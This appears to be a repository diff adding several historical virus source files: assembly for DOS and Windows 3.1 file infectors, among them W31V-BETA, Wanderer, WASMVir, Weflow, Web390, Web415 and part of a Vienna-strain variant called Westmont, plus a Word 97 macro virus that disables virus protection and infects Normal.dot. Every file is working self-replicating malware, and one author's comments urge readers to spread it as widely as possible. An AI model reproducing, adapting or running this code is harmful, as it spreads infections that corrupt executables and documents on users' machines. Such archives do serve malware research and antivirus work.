; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

330
MSDOS/Virus.MSDOS.Unknown.w31v.asm Normal file
View File

@ -0,0 +1,330 @@
;Virus Name: W31V-BETA
;Type : Windows Virus, infects windows executables
;Written by: Stalker X
;
;
;Here it is folks my first windows virus.
;I would firstly just want to say thankyou to qark and quantum for this
;virus is based on the infection of a windows virus as discribed in VLAD-#4
;Ok as you can see parts of this virus is based on WinSurfer, BUT as you
;can also see it's more compact. Instead of using dropper code I used a
;software fuse. This virus also does not go TSR in windows, it infects on
;execute. The reason why I did not make it TSR is because it's to mutch work
;for me :) and secondly well at the rate Windows users restart programs there
;is no need to go TSR!
;This is my first try so bare with me :) ooooh yes all that comments is
;not ment for you the reader ... BUT ME!! :) Frankly I get lost in my own
;code if I don't comment it.
;Ok Assemble this virus as a EXE then run it in the dir of a Win EXE
;This virus only infects one file at a time but it does change dir's to
;find a file. Nothing new exept that it's for windows .. if you don't
;understand what I have written ,,,, then get VLAD-#4
;
;Please do copy this code .. add your own stuff if you want to .. I didn't
;write this so it can sit on a shelf. SO GO WILD.. just don't say you wrote
;the whole thing yourself.... just spread it as far as you can and in
;many diffrent copies as you can.
jumps
.model tiny
.stack 512
.code
.286P
assume cs:@code,ds:@code
org 0
START: pusha ;save all general regs
push si ;save si
push di ;save di
push ds ;save ds
push es ;save es
FUSE: jmp Fused ;first time no DPMI
jmp DPMIdetect ;goto dpmi code
Fused: mov ax,cs ;ax=cs
mov ds,ax ;ds=ax
mov word ptr cs:[FUSE],9090h;blow fuse after 1st run
jmp DPMIFin ;skip dpmi code
DPMIdetect: mov ax,1686h ;check for dpmi
int 2fh ;do check
or ax,ax ;check return
jz DPMIfound ;if 0 then dpmi
jmp EXIT ;exit if no dpmi
DPMIfound: mov ax,000ah ;get alias selector
push cs ;save cs
pop bx ;restore cs in bx
int 31h ;do get alias
push ax ;save ax
pop ds ;restore ax ds
DPMIFin: mov ah,1ah ;set DTA
mov dx,offset DTA ;set DTA ofs
int 21h ;do set DTA
FindFirst: xor cx,cx ;set f attrib
mov ah,4eh ;find first file
mov dx,offset FSPEC ;set fspec
int 21h ;do find it
jc EXIT ;exit if no exe found
Check: call Chk4WinEXE ;check if it's a win exe
cmp [TMP],0 ;check return byte
jz FindNext ;go to next exe if not win
call Infect ;infect the win EXE
mov ah,3eh ;close the exe file
int 21h ;do it
jmp EXIT ;exit to infect only 1 file
FindNext: mov ah,4fh ;find next file
int 21h ;do find it
jnc Check ;go check again for win
ChangeDIR: mov dx,offset DOTDOT ;'..'
mov ah,3bh ;change dir
int 21h ;do change now
jnc FindFirst ;find first file in dir
EXIT: pop es ;restore es
pop ds ;restore ds
pop di ;restore di
pop si ;restore si
popa ;restore all general regs
db 0eah ;far Jmp
ret_ip: dw 0 ;exit program
ret_set dw 0ffffh ;-
Chk4WinEXE: mov dx,offset F_Name ;set file name ofs
mov ax,3d02h ;open file for r/w
int 21h ;do open file
jc ChkExit ;exit on error
mov bx,ax ;save handle in bx
mov si,offset BUFF ;si=offset of buffer
mov ah,3fh ;read function
mov dx,offset BUFF ;dx=offset of buffer
mov cx,512 ;read 512 bytes
int 21h ;do read bytes
cmp byte ptr [si+18h],40h ;check relocation
jb ChkFinF ;exit if not ok
cmp word ptr [si+3ch],400h ;check NE offset
jne ChkFinF ;exit if not ok
cmp word ptr [si+16h],0 ;CS must be 0
jne ChkFinF ;exit if not ok
cmp word ptr [si+14h],0 ;IP must be 0
jne ChkFinF ;exit if not ok
cmp word ptr [si+08h],20h ;check header size
je ChkFin ;exit if not ok
ChkFinF: mov ah,3eh ;close file
int 21h ;do close file
mov [TMP],0 ;return error
retn ;retn
ChkFin: mov [TMP],1 ;return ok
ChkExit: retn ;do it
Infect: mov si,offset BUFF ;si=offset buffer
sub word ptr [si+10h],8 ;move SP back 8 bytes
sub word ptr [si+3ch],8 ;move NE back 8 bytes
mov ax,4200h ;move r/w pointer
xor cx,cx ;cx=0
xor dx,dx ;dx=0
int 21h ;do move r/w pointer
mov ah,40h ;write to file
mov dx,offset BUFF ;set source offset
mov cx,3eh ;write EXE header back
int 21h ;do write header back
mov ax,4200h ;move r/w pointer
xor cx,cx ;cx=0
mov dx,200h ;set to dest
int 21h ;do move r/w pointer
mov ah,40h ;write to file
mov dx,offset winstart ;dx=source offset
mov cx,offset windowsmsgend-offset winstart
int 21h ;write new dos stub
mov ax,4200h ;move r/w pointer
xor cx,cx ;cx=0
mov dx,400h ;set offset
int 21h ;do move r/w pointer
mov ah,3fh ;read from file
mov dx,offset BUFF ;dx=offset of buffer
mov cx,512 ;read header
int 21h ;do read from file
inc word ptr [si+1ch] ;inc segment count
mov ax,word ptr [si+1ch] ;ax=segment count
dec ax ;ax=ax-1
mov cl,8 ;Assume Segs<255
mul cl ;multiply to get bytes
xor dx,dx ;dx=0
add ax,word ptr [si+22h] ;ax=total tab size
adc dx,0 ;add with carry(just incase)
mov cx,512 ;dx:ax/512
div cx ;do it
mov [Move512],ax ;Number of 512pages to mov
mov [MoveLft],dx ;Number of leftover bytes
push word ptr [si+32h] ;save file alignment value
pop [Al_Sh] ;save alignment shift value
mov [Seek],400h ;setup seek var
push word ptr [si+16h] ;save host cs
pop [hostcs] ;save NE cs
push word ptr [si+14h] ;save host ip
pop [hostip] ;save NE ip
mov ax,word ptr [si+1ch] ;ax=number of segments
mov word ptr [si+08h],0 ;clr crc
mov word ptr [si+0ah],0 ;clr crc
mov word ptr [si+14h],0 ;set new ip
mov word ptr [si+16h],ax ;set new cs
mov ax,word ptr [si+22h] ;
cmp word ptr [si+04h],ax ;
jb CmpRes ;
add word ptr [si+04h],8 ;
CmpRes: cmp word ptr [si+24h],ax ;
jb CmpResi ;
add word ptr [si+24h],8 ;
CmpResi: cmp word ptr [si+26h],ax ;
jb CmpModule ;
add word ptr [si+26h],8 ;
CmpModule: cmp word ptr [si+28h],ax ;
jb CmpImp ;
add word ptr [si+28h],8 ;
CmpImp: cmp word ptr [si+2ah],ax ;
jb MoveHead ;
add word ptr [si+2ah],8 ;
MoveHead: mov ax,[Move512] ;loop to move NE head
or ax,ax ;check if counter=0
jz Last ;exit if counter=0
dec [Move512] ;counter=counter-1
mov ax,4200h ;move r/w pointer
xor cx,cx ;cx=0
mov dx,[Seek] ;dx=seek
sub dx,8 ;dx=dx-8
int 21h ;do move r/w pointer
mov ah,40h ;write to file
mov dx,offset BUFF ;dx=source offset
mov cx,512 ;write 512 bytes
int 21h ;do write 512 bytes
add [Seek],512 ;seek=seek+512
mov ax,4200h ;move r/w pointer
xor cx,cx ;cx=0
mov dx,[Seek] ;dx=seek
int 21h ;do move r/w pointer
mov ah,3fh ;read file
mov dx,offset BUFF ;dx=offset buffer
mov cx,512 ;read 512 bytes
int 21h ;do read 512 bytes
jmp MoveHead ;continue to move header
Last: mov ax,4202h ;seek end of file
xor cx,cx ;cx=0
xor dx,dx ;dx=0
int 21h ;do seek
mov cl,byte ptr [Al_Sh] ;cl=shift count
push bx ;save bx
mov bx,1 ;bx=1
shl bx,cl ;calc shift
mov cx,bx ;cx=bx
pop bx ;restore bx
div cx ;divide with shift
mov di,offset BUFF ;di=buffer offset
add di,[MoveLft] ;calc where to patch
mov word ptr [di],ax ;patch insert segment tab
mov word ptr [di+2],offset ALL_VIR
mov word ptr [di+4],180h
mov word ptr [di+6],offset ALL_VIR
mov ax,4200h ;move r/w pointer
xor cx,cx ;cx=0
mov dx,[Seek] ;dx=seek
sub dx,8 ;dx=dx-8
int 21h ;do move r/w pointer
mov ah,40h ;write to file
mov dx,offset BUFF ;dx=source offset
mov cx,[MoveLft] ;write bytes left
add cx,8 ;cx=cx+8 (+segment entry)
int 21h ;do write to file
mov ax,4202h ;seek end of file
xor cx,cx ;cx=0
xor dx,dx ;dx=0
int 21h ;do seek
mov ax,word ptr ds:[ret_ip] ;save link
mov word ptr [si],ax ;save link
mov ax,[ret_set] ;save link
mov word ptr [si+2],ax ;save link
mov word ptr ds:[ret_ip],0 ;setup relocation
mov [ret_set],0FFFFh ;!
mov [relocation],1 ;!
mov [reloc2],3 ;!
mov [reloc3],4 ;!
mov [reloc4],offset ret_ip ;!
mov ah,40h ;write to file
xor dx,dx ;dx=0
mov cx,offset ALL_CODE ;write the hole body
int 21h ;do write
mov ax,word ptr [si] ;restore link
mov word ptr ds:[ret_ip],ax ;restore link
mov ax,word ptr [si+2] ;restore link
mov [ret_set],ax ;restore link
retn ;return from infection
;-Fake win msg
winstart: call windowsmsg
db 'This program requires Microsoft '
db 'Windows.',0dh,0ah,'$'
windowsmsg: pop dx
push cs
pop ds
mov ah,9
int 21h
mov ax,4c01h
int 21h
windowsmsgend:
TMP dw 0
Move512 dw 0
MoveLft dw 0
Al_Sh dw 0
Seek dw 0
DOTDOT db '..',0
FSPEC db '*.exe',0
DTA db 21 dup(0)
Attrib db 0
F_Time dw 0
F_Date dw 0
F_SizeL dw 0
F_SizeH dw 0
F_Name db 13 dup(0)
IDB db 'w31v-BETA'
BUFF db 512 dup(0)
ALL_VIR:
relocation dw 1
reloc2 db 3
reloc3 db 4
reloc4 dw offset ret_ip
hostcs dw 0
hostip dw 0
ALL_CODE:
end START

128
MSDOS/Virus.MSDOS.Unknown.w97_class_poppy.txt Normal file
View File

@ -0,0 +1,128 @@
'W97/Class.Poppy.B
'Word 97 Class Object Infector
'First Ever Class Object Infetor
Sub AutoOpen()
' AutoOpen Sub In Document
On Error GoTo out
' Handle Errors
Options.VirusProtection = False
' Turn Off Virus Protection
Options.SaveNormalPrompt = False
' Turn Off Normal.dot Save Prompt
Options.ConfirmConversions = False
' Turn Off Conversion Prompt (from 95 -> 97)
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
' Count The Number Of Code Lines In The Document
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
' Count The Number Of Code Lines In The Normal.dot
If nt > 70 And ad > 0 Then GoTo out
' If We Are Installed In Both (Lines > 0 and 72) Then Exit
If nt < 70 Then
' If We Are Not In The Normal.dot (Lines < 72) Then Install Us
Set infect = NormalTemplate.VBProject.VBComponents.Item(1)
' Set Normal.dot Class Section As Infect Object (What We Want To Infect)
ActiveDocument.VBProject.VBComponents.Item(1).Name = infect.Name
' Swamp The Class Section Names (Active Doc <- Normal Template)
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
' Export Our Virus Code
End If
If ad = 0 Then Set infect = ActiveDocument.VBProject.VBComponents.Item(1)
' If We Are Not In The Active Doc (Lines < 0) Then Install Us
If Day(Now) = 14 And (Month(Now) > 5) Then MsgBox "I Think " & Application.UserName & " is a big stupid jerk!", 0, "VicodinES Loves You / Class.Poppy"
' If The Day And Time Are Right Insult The User
infect.codemodule.AddFromFile ("c:\class.sys")
' Use The Infect Object - Import Your Virus Code
With infect.codemodule
' With The Newly Infected Class Object
For x = 1 To 4
' Clean Up The First 4 Lines Of Header-Code
.deletelines 1
' Delete Line 1 - 4 Times
Next x
End With
If nt < 70 Then
' If We Just Infected The Normal.Dot
With infect.codemodule
.replaceline 1, "Sub AutoClose()"
' Change AutoOpen (on line 1) to AutoClose
.replaceline 71, "Sub ToolsMacro()"
' Change Sub ViewVBCode (on line 71) to ToolsMacro
End With
End If
With infect.codemodule
' With The Newly Infected Object
For x = 2 To 72 Step 2
' Use Word Object Data As Polymorpic Code On Every Other Line
.replaceline x, "'" & Application.UserName & Now & Application.ActivePrinter & Application.ActiveWindow
Next x
End With
out:
If nt > 70 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
' If We Just Infected A Document Save It On Close
End Sub
Sub ViewVBCode()
' Stealth Hook
End Sub

195
MSDOS/Virus.MSDOS.Unknown.wanderer.asm Normal file
View File

@ -0,0 +1,195 @@
virus segment public 'code'
assume cs:virus,ds:virus,es:virus
org 0
VirusSize equ VirusEnd-$
Com: call Begin
call Label2
SavedCode:
mov ax,4c00h
int 21h
org SavedCode+5h
Label2: pop si
mov di,100h
push di
movsw
movsw
movsb
ret
Begin: push ds
push es
push ax
xor ax,ax
mov ds,ax
mov ds,ds:[46ah]
cmp Signature,0ACDCh
je Exit
mov ah,4ah
mov bx,-1
int 21h
sub bx,VirusParas1
jb Exit
add bh,10h
mov ah,4ah
int 21h
mov ah,48h
mov bx,VirusParas2
int 21h
jb Exit
dec ax
mov es,ax
inc ax
mov es:[1],ax
mov es,ax
push cs
pop ds
call Label1
Label1: pop si
sub si,offset Label1
xor di,di
push di
mov cx,VirusSize
rep movsb
pop ds
mov ax,ds:[84h]
mov word ptr es:OldInt21[0],ax
mov ax,ds:[86h]
mov word ptr es:OldInt21[2],ax
mov byte ptr ds:[467h],0eah
mov word ptr ds:[468h],offset NewInt21
mov ds:[46ah],es
mov word ptr ds:[84h],7
mov word ptr ds:[86h],46h
Exit: pop ax
pop ds
pop es
ret
Header db 0e9h
dw 0
Signature dw 0ACDCh
NewInt21:
cmp ah,4bh
jne on1
jmp exec
on1: cmp ah,4eh
je find
cmp ah,4fh
je find
jmp EOI
Db ' As wolfs among sheep we have wandered '
Find: call interrupt ; call orginal interrupt
jc Ret1 ; error ?
pushf ; save registers
push ax
push bx
push es
mov ah,2fh
call interrupt
mov al,es:[bx+16h] ; get file-time (low byte)
and al,1fh ; seconds
cmp al,1fh ; 62 seconds ?
jne FileOk ; no, file not infected
sub word ptr es:[bx+1ah],VirusSize ; change file-size
sbb word ptr es:[bx+1ch],0
Time: xor byte ptr es:[bx+16h],10h ; adjust file-time
FileOk: pop es ; restore registers
pop bx
pop ax
popf
ret1: retf 2
Exec: push ax
push bx
push cx
push dx
push ds
mov ax,3d02h
call Interrupt
jc short Error
push cs
pop ds
mov bx,ax
mov ah,3fh
mov cx,5h
mov dx,offset SavedCode
call DOS
cmp word ptr cs:SavedCode,'ZM'
je short TheEnd
ComFile:cmp word ptr cs:SavedCode[3],0ACDCh
je short TheEnd
mov al,02h
call Seek
or dx,dx
cmp ah,0f6h
je short Close
sub ax,5
inc ax
inc ax
mov word ptr ds:Header[1],ax
mov ax,5700h
call dos
push cx
push dx
mov ah,40h
mov cx,VirusSize
xor dx,dx
call DOS
mov al,00h
call Seek
mov ah,40h
mov cx,5
mov dx,offset Header
call dos
Close: mov ax,5701h
pop dx
pop cx
or cl,1fh
call dos
TheEnd: mov ah,3eh
call Interrupt
Error: pop ds
pop dx
pop cx
pop bx
pop ax
EOI: db 0eah ; jmp 0:0
OldInt21 dd 026b1465h
Seek: mov ah,42h
xor cx,cx
xor dx,dx
DOS: call Interrupt
jnc Ok
pop ax
jmp Close
Interrupt:
pushf
call cs:OldInt21
Ok: ret
VirusEnd equ $
VirusParas1 equ (VirusSize+1fh)/10h+1000h
VirusParas2 equ (VirusSize+0fh)/10h
virus ends
end
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

54
MSDOS/Virus.MSDOS.Unknown.wasmvir.asm Normal file
View File

@ -0,0 +1,54 @@
;WASMVir --> A lame overwriting virus to demonstrate WASM
;Overwrites all files in the current directory
;By Lord Natas
org 100h
Start
mov ah,4eh
mov cx,7
mov dx,offset FileSpec
Virus
;----- find file
int 21h
jc EndV
;----- open file
mov ax,3d01h
mov dx,9eh
int 21h
jc Close
xchg bx,ax
;----- write file
mov ah,40h
mov cl,Length
mov dx,offset Start
int 21h
Close
;----- close file
mov ah,3eh
int 21h
mov ah,4fh
jmps Virus
EndV
db 00C3h ;"RET"
;----- data
db 'WASMVir'
FileSpec db '*.COM',0
TheEnd
Length equ offset TheEnd - offset Start

225
MSDOS/Virus.MSDOS.Unknown.web_390.asm Normal file
View File

@ -0,0 +1,225 @@
Model Tiny
.code
.286
org 100h
start:
push cs
push offset Entry
retf
db 'DrWeb - £®à¡ãå !'
BEG_LEN equ $-start
Entry:
pusha
push ds
push es
call En1
EN_LEN equ $-Entry
En1:
push ds
pop es
xchg ax,di
pop bp
sub bp,EN_LEN
mov bx,1100h
mov ah,4ah
int 21h
jnc ALLOCATED
Exit_Proc:
pop es
pop ds
popa
push cs
push si
retf
ALLOCATED:
mov ax,LBL
add ax,bp
mov cl,4
shr ax,cl
inc ax
push ds
pop bx
add ax,bx
push ax
push cs
pop ds
pop es
LBL10:
mov si, bp
cld
xor cx,cx
add si, Crypt_Start
LBL0:
mov ax,word ptr ds:[si]
inc cx
mov bx,word ptr ds:[si+2]
inc cx
xchg ah,al
inc cx
xchg bh,bl
inc cx
xchg ax,bx
xor ax,0BEBEh
xor bx,0BEBEh
mov word ptr ds:[si],ax
mov word ptr ds:[si+2],bx
add si,4
cmp cx, Crypt_LEN
jge LBL1
jmp short LBL0
LBL1:
Crypt_Start equ $-Entry
mov ah,1ah
mov dx,bp
add dx,Crypt_End
mov bx,dx
int 21h
push es
push cs
pop es
mov di,100h
mov si,bp
add si,Old_BEGIN
mov cx,BEG_LEN
rep movsb
pop es
cld
mov ah,4eh
mov cx, 20h
mov dx,bp
add dx,C_Mask
Interrupt:
int 21h
jb Not_Found
jmp Test_File
Not_Found:
mov ah,1ah
mov dx,80h
int 21h
jmp Exit_Proc
Test_File:
push bx
add bx,1ah
mov ax,[bx]
and ax,0f000h
cmp ax,0f000h
jnz Len_Tested
Find_Next:
pop bx
mov ah,4fh
jmp Short Interrupt
Len_Tested:
add bx,04h
xchg dx,bx
mov ax,3d02h
int 21h
xchg ax,bx
mov ah,3fh
mov cx,BEG_LEN
mov dx,bp
add dx,Old_BEGIN
push dx
int 21h
pop si
cmp byte ptr ds:[si+14h],'!'
je Close_File
jmp short Uses_File
Close_File:
mov ah,3eh
int 21h
jmp Find_Next
Uses_File:
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
push ax
cld
mov si,bp
xor di,di
mov cx, Crypt_End / 2
rep movsw
pusha
push es
pop ds
xor cx,cx
mov si, Crypt_Start
LBL_0:
mov ax,word ptr ds:[si]
inc cx
mov bx,word ptr ds:[si+2]
inc cx
xchg ah,al
inc cx
xchg bh,bl
inc cx
xchg ax,bx
xor ax,0BEBEh
xor bx,0BEBEh
mov word ptr ds:[si],ax
mov word ptr ds:[si+2],bx
add si,4
cmp cx, Crypt_LEN
jge LBL_1
jmp short LBL_0
LBL_1:
popa
mov ah,40h
mov cx,Crypt_End
xor dx,dx
int 21h
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
push cs
pop ds
pop ax
pop si
push si
mov di,bp
add ax,100h
add di,New1
inc di
mov [di],ax
mov ah,40h
mov dx,bp
add dx,New_BEGIN
mov cx,BEG_LEN
int 21h
jmp Close_File
C_MASK equ $-Entry
db '*.com',0h
New_BEGIN equ $-Entry
push cs
LI:
New1 equ $-Entry
push offset Entry
retf
Apll equ $-Entry
Rems equ $-LI
db 'DrWeb - £®à¡ãå !'
Old_BEGIN equ $-Entry
db 0c3h
db BEG_LEN-1 dup (90h)
db 'RedArc // [TAVC]'
Crypt_End equ $-Entry
Crypt_LEN equ $-LBL1
DTA db 80h dup (?)
LBL equ $-Entry
end start

232
MSDOS/Virus.MSDOS.Unknown.web_415.asm Normal file
View File

@ -0,0 +1,232 @@
;----------------------------------------------------------------------------
; ‚¨àãá Web415
; ‘¥¬¥©á⢮ Search
;----------------------------------------------------------------------------
; (c) 1997 by I. Dikshew // [TAVC] // -=* Red Arc *=-
;----------------------------------------------------------------------------
Model Tiny
.Code
.286
org 100h
start:
push cs
push offset Entry
retf
db 'DrWeb - £®à¡ãå !'
BEG_LEN equ $-start
Entry:
pusha
push ds
push es
call En1
EN_LEN equ $-Entry
En1:
push ds
pop es
xchg ax,di
pop bp
sub bp,EN_LEN
mov bx,1100h
mov ah,4ah
int 21h
jnc ALLOCATED
Exit_Proc:
pop es
pop ds
popa
push cs
push si
retf
ALLOCATED:
mov ax,LBL
add ax,bp
mov cl,4
shr ax,cl
inc ax
push ds
pop bx
add ax,bx
push ax
push cs
pop ds
pop es
LBL10:
mov si, bp
cld
xor cx,cx
add si, Crypt_Start
LBL0:
mov ax,word ptr ds:[si]
inc cx
mov bx,word ptr ds:[si+2]
inc cx
xchg ah,al
inc cx
xchg bh,bl
inc cx
xchg ax,bx
xor ax,0BEBEh
xor bx,0BEBEh
mov word ptr ds:[si],ax
mov word ptr ds:[si+2],bx
add si,4
cmp cx, Crypt_LEN
jge LBL1
jmp short LBL0
LBL1:
Crypt_Start equ $-Entry
mov ah,1ah
mov dx,bp
add dx,Crypt_End
mov bx,dx
int 21h
push es
push cs
pop es
mov di,100h
mov si,bp
add si,Old_BEGIN
mov cx,BEG_LEN
rep movsb
pop es
mov byte ptr ds:[bp+Count],0
cld
mov ah,4eh
mov cx, 20h
mov dx,bp
add dx,C_Mask
Interrupt:
int 21h
jb Not_Found
jmp Test_File
Not_Found:
mov ah,1ah
mov dx,80h
int 21h
jmp Exit_Proc
Test_File:
push bx
add bx,1ah
mov ax,[bx]
and ax,0f000h
cmp ax,0f000h
jnz Len_Tested
Find_Next:
pop bx
mov ah,4fh
jmp Short Interrupt
Len_Tested:
add bx,04h
xchg dx,bx
mov ax,3d02h
int 21h
xchg ax,bx
mov ah,3fh
mov cx,BEG_LEN
mov dx,bp
add dx,Old_BEGIN
push dx
int 21h
pop si
cmp byte ptr ds:[si+14h],'!'
je Close_File
jmp short Uses_File
Close_File:
mov ah,3eh
int 21h
mov al,byte ptr ds:[bp+Count]
cmp al,1
jne Find_Next
pop bx
jmp Not_Found
Uses_File:
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
push ax
cld
mov si,bp
xor di,di
mov cx, Crypt_End / 2
rep movsw
pusha
push es
pop ds
xor cx,cx
mov si, Crypt_Start
LBL_0:
mov ax,word ptr ds:[si]
inc cx
mov bx,word ptr ds:[si+2]
inc cx
xchg ah,al
inc cx
xchg bh,bl
inc cx
xchg ax,bx
xor ax,0BEBEh
xor bx,0BEBEh
mov word ptr ds:[si],ax
mov word ptr ds:[si+2],bx
add si,4
cmp cx, Crypt_LEN
jge LBL_1
jmp short LBL_0
LBL_1:
popa
mov ah,40h
mov cx,Crypt_End
xor dx,dx
int 21h
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
push cs
pop ds
pop ax
pop si
push si
mov di,bp
add ax,100h
add di,New1
inc di
mov [di],ax
mov ah,40h
mov dx,bp
add dx,New_BEGIN
mov cx,BEG_LEN
int 21h
mov byte ptr ds:[bp+Count],1
jmp Close_File
C_MASK equ $-Entry
db '*.com',0h
New_BEGIN equ $-Entry
push cs
LI:
New1 equ $-Entry
push offset Entry
retf
Apll equ $-Entry
Rems equ $-LI
db 'DrWeb - £®à¡ãå !'
Old_BEGIN equ $-Entry
db 0c3h
db BEG_LEN-1 dup (90h)
Count equ $-Entry
db ?
db 'RedArc // [TAVC]'
Crypt_End equ $-Entry
Crypt_LEN equ $-LBL1
LBL equ $-Entry
end start

35
MSDOS/Virus.MSDOS.Unknown.weflow.asm Normal file
View File

@ -0,0 +1,35 @@
;|
;| WEFLOW 1993 VIRUS BY TESLA 5
;|
;| THIS VIRUS IS BASED ON THE TRIDENT OVERWRITING VIRUS. SORRY FOR
;| LAMING AROUND, BUT IT KEEPS VARIANTS RISING. GREETINGS TO TRIDENT,
;| NUKE, PHALCON/SKISM AND YAM. YOU DON'T KNOW ME, BUT I DO...
;|
ORG 100H
MAIN: MOV AH,4EH
NOTSOCOOL: LEA DX,FF
INT 21H
JNC COOL
RET
COOL: MOV AX,3D02H
MOV DX,9EH
INT 21H
XCHG AX,BX
MOV CL,VLEN
MOV AH,40H
INT 21H
MOV AH,3EH
INT 21H
MOV AH,4FH
JMP NOTSOCOOL
FF DB '*.*',0
DB 'WEFLOW93'
VLEN EQU $-MAIN

597
MSDOS/Virus.MSDOS.Unknown.westmont.asm Normal file
View File

@ -0,0 +1,597 @@
; Westmont: A vienna strain
; This is a variation on the Vienna virus which has had sections of its
; code moved around and rewritten in hopes that AV software will
; not be able to recognize it. The seconds flag used to make sure
; that a file isn't infected twice has been modified to 61. The
; check for DOS v1.x has been deleted. Thanks to 40Hex for the
; source to the original Vienna. What a novice (me) can do with
; well documented code!
;------------------------------------------------------------------------------
MOV_CX MACRO X
DB 0B9H
DW X
ENDM
CODE SEGMENT
ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE
ORG $+0100H
;*****************************************************************************
;Start out with a JMP around the remains of the original .COM file, into the
;virus. The actual .COM file was just an INT 20, followed by a bunch of NOPS.
;The rest of the file (first 3 bytes) are stored in the virus data area.
;*****************************************************************************
VCODE: JMP virbeg
;This was the rest of the original .COM file. Tiny and simple, this time
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
;************************************************************
; The actual virus starts here
;************************************************************
v_start equ $
virbeg: JMP codesrt ; Jump around signature
DB "Westmont",0
DB "Ender"
codesrt:
CALL memtrick ; Call offset setting procedure
JMP find_path ; Start ifect routine
;**********************************************************************
; Here when it's time to close it up & end
;**********************************************************************
all_done:
PUSH DS
;**********************************************************************
; Restore old DTA
;**********************************************************************
MOV AH,1AH
MOV DX,[SI+old_dta]
MOV DS,[SI+old_dts]
INT 21H
POP DS
;*************************************************************************
; Clear registers used, & do a weird kind of JMP 100. The weirdness comes
; in since the address in a real JMP 100 is an offset, and the offset
; varies from one infected file to the next. By PUSHing an 0100H onto the
; stack, we can RET to address 0100H just as though we JMPed there.
;**********************************************************************
quit:
POP CX
XOR AX,AX
XOR BX,BX
XOR DX,DX
XOR SI,SI
MOV DI,OFFSET 0100H
PUSH DI
XOR DI,DI
RET 0FFFFH
; Infection routine
; ~~~~~~~~~~~~~~~~~
;************************************************************
; Find the "PATH=" string in the environment
;************************************************************
find_path:
POP SI
PUSH SI ;Get SI back
ADD SI,env_str ;Point to "PATH=" string in data area
LODSB
MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long
REPNZ SCASB ;Search for first character
MOV CX,4
;************************************************************
; Loop to check for the next four characters
;************************************************************
check_next_4:
LODSB
SCASB
JNZ find_path ;If not all there, abort & start over
LOOP check_next_4 ;Loop to check the next character
POP SI
POP ES
MOV [SI+path_ad],DI ;Save the address of the PATH
MOV DI,SI
ADD DI,wrk_spc ;File name workspace
MOV BX,SI ;Save a copy of SI
ADD SI,wrk_spc ;Point SI to workspace
MOV DI,SI ;Point DI to workspace
JMP SHORT slash_ok
;**********************************************************
; Look in the PATH for more subdirectories, if any
;**********************************************************
set_subdir:
CMP WORD PTR [SI+path_ad],0 ;Is PATH string ended?
JNZ found_subdir ;If not, there are more subdirectories
JMP all_done ;Else, we're all done
;**********************************************************
; Here if there are more subdirectories in the path
;**********************************************************
found_subdir:
PUSH DS
PUSH SI
MOV DS,ES:2CH ;DS points to environment segment
MOV DI,SI
MOV SI,ES:[DI+path_ad] ;SI = PATH address
ADD DI,wrk_spc ;DI points to file name workspace
;***********************************************************
; Move subdirectory name into file name workspace
;***********************************************************
move_subdir:
LODSB ;Get character
CMP AL,';' ;Is it a ';' delimiter?
JZ moved_one ;Yes, found another subdirectory
CMP AL,0 ;End of PATH string?
JZ moved_last_one ;Yes
STOSB ;Save PATH marker into [DI]
JMP SHORT move_subdir
;******************************************************************
; Mark the fact that we're looking through the final subdirectory
;******************************************************************
moved_last_one:
MOV SI,0
;******************************************************************
; Here after we've moved a subdirectory
;******************************************************************
moved_one:
POP BX ;Pointer to virus data area
POP DS ;Restore DS
MOV [BX+path_ad],SI ;Address of next subdirectory
NOP
;******************************************************************
; Make sure subdirectory ends in a "\"
;******************************************************************
CMP CH,'\' ;Ends with "\"?
JZ slash_ok ;If yes
MOV AL,'\' ;Add one, if not
STOSB
;******************************************************************
; Here after we know there's a backslash at end of subdir
;******************************************************************
slash_ok:
MOV [BX+nam_ptr],DI ;Set filename pointer to name workspace
MOV SI,BX ;Restore SI
ADD SI,f_spec ;Point to "*.COM"
MOV CX,6
REPZ MOVSB ;Move "*.COM",0 to workspace
MOV SI,BX
;*******************************************************************
; Find first string matching *.COM
;*******************************************************************
MOV AH,4EH
MOV DX,wrk_spc
; NOP ;MASM will add this NOP here
ADD DX,SI ;DX points to "*.COM" in workspace
MOV CX,3 ;Attributes of Read Only or Hidden OK
INT 21H
JMP SHORT find_first
;*******************************************************************
; Find next ASCIIZ string matching *.COM
;*******************************************************************
find_next:
MOV AH,4FH
INT 21H
find_first:
JNB found_file ;Jump if we found it
JMP SHORT set_subdir ;Otherwise, get another subdirectory
;*******************************************************************
; Here when we find a file
;*******************************************************************
found_file:
MOV AX,[SI+dta_tim] ;Get time from DTA
AND AL,1FH ;Mask to remove all but seconds
CMP AL,1FH ;62 seconds -> already infected
JZ find_next ;If so, go find another file
